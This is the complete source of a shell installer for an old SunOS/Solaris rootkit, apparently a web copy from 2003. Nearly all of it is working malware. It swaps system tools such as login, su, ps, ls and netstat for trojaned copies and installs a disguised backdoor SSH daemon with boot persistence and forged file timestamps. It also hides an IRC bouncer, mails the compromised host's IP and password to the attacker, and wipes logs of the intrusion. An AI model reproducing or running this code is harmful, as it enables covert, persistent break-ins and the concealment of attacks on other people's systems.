Rootkit Setup Script

#!/bin/sh
# .,gg,.        .,gg,.
# `$$$$$.      .$$$$$'
#  `$$$$$.    .$$$$$' .,g%d$"^"$b%y,.      .,g%d$"^"$b%y,..,g%d$"^"$b%y,.
#   `$$$$$.  .$$$$$'g$$$$'       `$$$$y..g$$$$'        .g$$$$'       `""'
#     $$$$$$$$$$$$.l$$$$:         :$$$$ll$$$$:         l$$$$:  g%d$$b%y,.
#   .$$$$$'""`$$$$$.$$$$$p       g$$$$$'l$$$$:         l$$$$:       l$$$$:
#  .$$$$$'    `$$$$$.`^"$b%y,.,g%d~"^'  `"--"'          `^"$b%y,.,g%d~"^'
# .$$$$$'      `$$$$$.  
# `""""'        `""""' you can stop one, but you can't stop all of us!
#                                                (Leeto ASCII By: Johnny7)
#
#   X-Org SunOS Rootkit v2.5D X-ORG Internal Release  Edition By: Judge-D/Danny-Boy
#         	     Special Thanks to Tragedy/Dor for Setup Wrapper 
#		       If your not meant to have this, dont use it
#                           http://www.xorganisation.org
#                           http://www.xorg2000.com

IVER="2.5DXE-ORG"
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH

# Edit these
# Dir to install rootkit in
RKDIR="/usr/lib/libX.a"
# Your email address
EMAIL="[email protected]"

colours()
{
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
}
colours


STIME=`./utime`
echo "${DCYN}bobz oN ircNet on join #privè "
cat logo
chmod +x dl
./dl
echo "${WHI}*${DWHI} Starting up at: ${DCYN}${STIME}${DWHI}"

INDIR=`pwd`
OS=`uname -s`
VER=`uname -r`
CPU=`uname -i`

cdir()
{
if test ! -d $1 ; then
mkdir $1
fi
}

backup()
{
if test -f /usr/lib/libX.a/bin/${2} ; then
cp /usr/lib/libX.a/bin/${2} /usr/lib/libX.a/bin/tmpfl
fi

if test -f "$1" ; then
cp $1 /usr/lib/libX.a/bin/
printf " $2"
fi

if test -f /usr/lib/libX.a/bin/tmpfl ; then
mv /usr/lib/libX.a/bin/tmpfl /usr/lib/libX.a/bin/${2}
fi
}

cprk()
{
cp $1 /usr/lib/libX.a/
printf " $1"
}

cdir()
{
if test ! -d $1 ; then
mkdir $1
fi
}

unsuid()
{
if test -f "$1" ; then
chmod u-s $1
printf " $2"
fi
}

# trojan proc..
# $1 = trojan
# $2 is real file
# example: trojan su /sbin/su
# no full path for trojan
trojan()
{
if test -f "$2" ; then
./sz $2 ./$1
./fix /$2 ./$1
printf " $1"
fi
}


printf "${WHI}*${DWHI} Installing from $INDIR - Will erase $INDIR after install\n"

        case $OS in
		SunOS)
			;;
		*)
		echo "${WHI}*${DWHI} ${RED} Oops.. im DUMB! i tried installing SunOS Rootkit on $OS :P"
		exit 10
			;;
                esac

# Ok.. so if theyre not lame, and running this on SunOS like they should...
        case $VER in
		5.5)
			cp /bin/ls ./
			;;
		5.5.1)
                        cp /bin/ls ./
                        ;;
                5.7)
                        ;;
                5.6)
                        ;;
		5.8)
                        ;;
		5.4)
			cp /bin/ls ./
			;;
		*)
			printf "${RED}**FATAL**${DWHI} Sorry. SunOS Version $VER is NOT supported.\n"
			exit
			;;
		esac
# check for x86 boxes, since this rootkit is precompiled for sparcs
        case $CPU in
		i86pc)
			printf "${RED}**FATAL**${DWHI} This rootkit is precompiled for Sparc only, this system is $CPU\n"
			exit
			;;
		*)
                        ;;
		esac

printf "${WHI}*${DWHI} Checking for existing rootkits..\n"

./findkit 

cdir /tmp/.pat
cdir /usr/lib/
cdir $RKDIR
cdir /usr/lib/libX.a/bin

echo "${WHI}***${DWHI} Insert Rootkit Password : "
read PASSWD
echo "${WHI}***${DWHI} Using Password $PASSWD"
./pg $PASSWD >/etc/lpd.config
PASS=$PASSWD
echo "su_pass=`./rpass`" >>x.conf2
echo "${WHI}***${DWHI} Insert Rootkit SSH Port : "
read PORT
echo "${WHI}***${DWHI} Using Port $PORT"
echo "${WHI}***${DWHI} Insert Rootkit PsyBNC Port : "
read EPORT
echo "${WHI}***${DWHI} Using Port $EPORT"

echo "net_filters=$PORT,$EPORT,17171,60001,6667,6668,5555" >>x.conf
cat x.conf2 >>x.conf

./crypt x.conf /usr/lib/libX.a/uconf.inv

printf "${WHI}*${DWHI} Making backups..."
if test -f $RKDIR/bin ; then
echo "KIT ALREADY INSTALLED - SKIPPING BACKUPS"
else
backup /bin/su su
backup /usr/sbin/ping ping
backup /usr/bin/du du
backup /usr/bin/passwd passwd
backup /usr/bin/find find
backup /bin/ls ls
backup /bin/netstat netstat
backup /usr/bin/strings strings
fi

if test ! -f /usr/lib/libX.a/bin/rps ; then
cp /usr/bin/ps /usr/lib/libX.a/bin/rps
fi
printf " ps"

printf " Done.\n"
printf "${WHI}*${DWHI} Installing trojans..."

###Backdoors

# Special sz for login which checks for known login trojans
./szl /usr/bin/login ./login
./fix /usr/bin/login ./login /sbin/xlogin
printf " login"

if [ -f /usr/bin/srload ]; then
	/usr/bin/ps -fe | grep srload | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
	chmod 755 /usr/bin/srload
	echo "Port ${PORT}" >etc/sshd_config
	cat etc/tconf >>etc/sshd_config
	rm -f etc/tconf
	cp -f etc/* /usr/bin/
	/usr/bin/srload -q
else
	cp -f sshd /usr/bin/srload
	/usr/bin/ps -fe | grep srload | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
	chmod 755 /usr/bin/srload
	echo "Port ${PORT}" >etc/sshd_config
	cat etc/tconf >>etc/sshd_config
        rm -f etc/tconf
        cp -f etc/* /usr/bin/
	/usr/bin/srload -q
fi
echo "" >>/etc/init.d/network
echo "# Reloading Network Settings" >>/etc/rcS.d/S30rootusr.sh
echo "" >>/etc/rcS.d/S30rootusr.sh
echo "  if [ -f /usr/bin/srload ]; then" >>/etc/rcS.d/S30rootusr.sh
echo "          /usr/bin/srload -q" >>/etc/rcS.d/S30rootusr.sh
echo "          /usr/sbin/modcheck    " >>/etc/rcS.d/S30rootusr.sh
echo "  fi" >>/etc/rcS.d/S30rootusr.sh
echo "SV:23:respawn:/usr/bin/srload -D -q" >>/etc/inittab
touch -r /etc/swapadd /etc/inittab
touch -r /etc/swapadd /etc/rcS.d/S30rootusr.sh
/usr/sbin/init q
printf " sshd"

###Trojans
cd $INDIR

# Netstat Trojan
if test -f "/usr/bin/netstat" ; then
./sz /usr/bin/netstat ./netstat
./fix /usr/bin/netstat ./netstat
printf " netstat"
fi

# ls trojan
if test -f "/usr/bin/ls" ; then
./sz /usr/bin/ls ./ls2
./fix /usr/bin/ls ./ls2
printf " ls"
fi

# lsof trojan
if test -f "/usr/local/bin/lsof" ; then
./sz /usr/local/bin/lsof ./lsof
cp /usr/local/bin/lsof /usr/lib/libX.a/bin/
./fix /usr/local/bin/lsof ./lsof
printf " lsof"
fi

# find trojan
if test -f "/usr/bin/find" ; then
./sz /usr/bin/find ./find
./fix /usr/bin/find ./find
printf " find"
fi

#strings trojan
if test -f "/usr/bin/strings" ; then
./sz /usr/bin/strings ./strings
./fix /usr/bin/strings ./strings
printf " strings"
fi

# du trojan
if test -f "/usr/bin/du" ; then
./sz /usr/bin/du ./du
./fix /usr/bin/du ./du
printf " du"
fi

# top trojan
if test -f "/usr/local/bin/top" ; then
./sz /usr/local/bin/top ./top
rm -f /usr/local/bin/top
./fix /usr/local/bin/top ./top
printf " top"
fi

# passwd trojan
if test -f "/usr/bin/passwd" ; then
./sz /usr/bin/passwd ./passwd
./fix /usr/bin/passwd ./passwd
printf " passwd"
fi

# ping trojan
if test -f "/usr/sbin/ping" ; then
./sz /usr/sbin/ping ./ping
printf " ping"
fi

# su trojan
if test -f "/bin/su" ; then
./sz /bin/su ./su
./fix /bin/su ./su $RKDIR/oldsuper
printf " su"
fi

printf " Complete.\n"

printf "${WHI}*${DWHI} Suid removal"

unsuid /usr/bin/at at
unsuid /usr/bin/atq atq 
unsuid /usr/bin/atrm atrm
unsuid /usr/bin/eject eject
unsuid /usr/bin/fdformat fdformat
unsuid /usr/bin/rdist rdist
unsuid /bin/rdist rdist
unsuid /usr/bin/admintool admintool
unsuid /usr/lib/fs/ufs/ufsdump ufsdump
unsuid /usr/lib/fs/ufs/ufsrestore ufsrestore
unsuid /usr/lib/fs/ufs/quota quota
unsuid /usr/openwin/bin/ff.core ff.core
unsuid /usr/bin/lpset lpset
unsuid /usr/bin/lpstat lpstat
unsuid /usr/lib/lp/bin/netpr netpr
unsuid /usr/sbin/arp arp
unsuid /usr/vmsys/bin/chkperm chkperm

chmod u-s /usr/openwin/bin/*
chmod u-s /usr/dt/bin/*
printf " Complete.\n"

cp wget /usr/bin
echo "${WHI}*${DWHI} Starting Patcher..."
$INDIR/p-engine
cp $INDIR/patch.* $RKDIR/

case $VER in
	5.5)
		$RKDIR/patch.sol5
		;;
	5.6)	
		$RKDIR/patch.sol6
		;;
	5.7)
		$RKDIR/patch.sol7
		;;
	5.8)
		$RKDIR/patch.sol8
		;;
	*)
		printf "No Extra Patches for This Release <:\n"
		;;
	esac

cd $INDIR
# ps trojan
cd $INDIR;
if test -f /lib/ldlibps.so; then
cp -f /lib/ldlibps.so /usr/bin/ps
fi
./sz /usr/bin/ps ./ps
./fix /usr/bin/ps ./ps
# required for sol7/8
if test -d /usr/bin/sparcv7 ; then
cdir /usr/lib/libX.a/bin/sparcv7
cp -f /bin/sparcv7/ps /usr/lib/libX.a/bin/sparcv7/rps
fi
printf "PS Trojaned"

IFT=`/sbin/ifconfig -a | head -n 3|grep -v "lo0"|grep flags|awk '{print $1}'`
IFX=`echo $IFT | cut -d 0 -f 1`
echo "${WHI}*${DWHI} Primary network interface is of type: ${DCYN}${IFX}${DWHI}"

### sniffer
#cp sn2 /usr/sbin/modstat
#echo "nohup /usr/sbin/modstat -s -d 512 -i /dev/${IFX} -o /usr/lib/libp/libm.n >/dev/null &" >>sniffload
cp sniffload /usr/sbin/modcheck
#echo "${WHI}*${DWHI} Sniffer set"
#nohup /usr/sbin/modcheck >/dev/null 2>&1
### end sniffer

printf "${WHI}*${DWHI} Copying utils.."

cp pg $RKDIR/passgen
cp cleaner $RKDIR/wipe
cp utime $RKDIR/utime
cp l3 $RKDIR/l
cp crypt $RKDIR/crt
cp ssh-dxe $RKDIR/ssh-dxe
cp syn $RKDIR/syn
cp startbnc $RKDIR/loadbnc

#if test -f "./dos"; then
#cp td /usr/sbin/ntpq
#touch /etc/security/audit_device
#/usr/sbin/ntpq
#fi

printf " passgen fixer wipe utime crt idstart ssh-dxe syn README  Done.\n"

### pident.d BACKDOOR
#cp -f in.identd /usr/sbin/in.identd
#chmod 755 /usr/sbin/in.identd
#echo "auth   stream  tcp     nowait    nobody    /usr/sbin/in.identd in.identd" >> /etc/inetd.conf
#printf "${WHI}*${DWHI} in.identd backdoor installed on port 113 \n"
#printf "${WHI}*${RED} DONT FORGET TO RESTART INETD!"
###

### BNC2

#cp bnclp /usr/sbin/ntptime
#cp bnc.conf /usr/sbin/ntptime.conf
#echo "${WHI}*${DWHI} BNC2 has now been copied to /usr/sbin/ntptime and configured on port:1578"

### end BNC2

### psyBNC
cdir /dev/cua/...
cp psy.tar.Z /dev/cua/.../
cd /dev/cua/...
uncompress psy.tar.Z && tar xvf psy.tar >>/dev/null
echo "PSYBNC.SYSTEM.PORT1=$EPORT" >psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >>psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >>psybnc.conf
echo "${WHI}*${DWHI} psyBNC has now been configured on port $EPORT (default) with no IDENT"
### end psyBNC

echo "${WHI}*${DWHI} erasing rootkit..."
cd $INDIR
cd ..
cd $RKDIR
rm -rf /tmp/.pat

PRIMIF=`/sbin/ifconfig -a|grep inet|head -n 2|grep -v 127.0.0.1|awk '{print $2}'`
IFCNT=`/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|wc -l`
UNAM=`uname -a`

DUPTEST=`dmesg|grep "SUNW,hme0"|head -n 1|cut -d ":" -f 1`
if [ $DUPTEST ];then
LINKUP=`dmesg|grep "SUNW,hme0"|grep "Link"|head -n 1`
echo "${WHI}*${DWHI} $LINKUP"
fi
NEXUS=`dmesg|grep nexus|head -n 1`

FTIME=`$RKDIR/utime`
ITIME=`expr $FTIME - $STIME`

echo "${WHI}*${DCYN} Rootkit installation Completed in ${ITIME} Seconds.${DWHI}"
echo "${WHI}*${DWHI} Password: $PASS"
echo "${WHI}*${DWHI} $UNAM"
echo "${WHI}*${DWHI} Primary interface IP: $PRIMIF"
echo "${WHI}*${DWHI} Possible $IFCNT host aliases"
echo "${WHI}*${DWHI} $NEXUS"
echo "Rootlist line:"
echo "$PRIMIF:${PORT}   $PASS  PSYBNC:${EPORT}"

# enable this if you want
echo "$PRIMIF:${PORT} Solaris $VER  $PASS" | mail ${EMAIL}

# Here you could add optional commands to clean logs
# EG: to remove traces of rpc.sadmind exploitation
echo "${WHI}*${DCYN} Removing Logs...Insert Your IP: "
read MYIP
$RKDIR/wipe $MYIP
$RKDIR/wipe sadmin
$RKDIR/wipe cmsd
$RKDIR/wipe snmp
echo "${WHI}*${DCYN} Done...Enjoy Your Stay :)"
echo "${WHI}*${DCYN} Modified by warning on IrcNet"
/usr/bin/ps -fe | grep ssld | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh




Last modified: Thu May 22 15:03:02 EEST 2003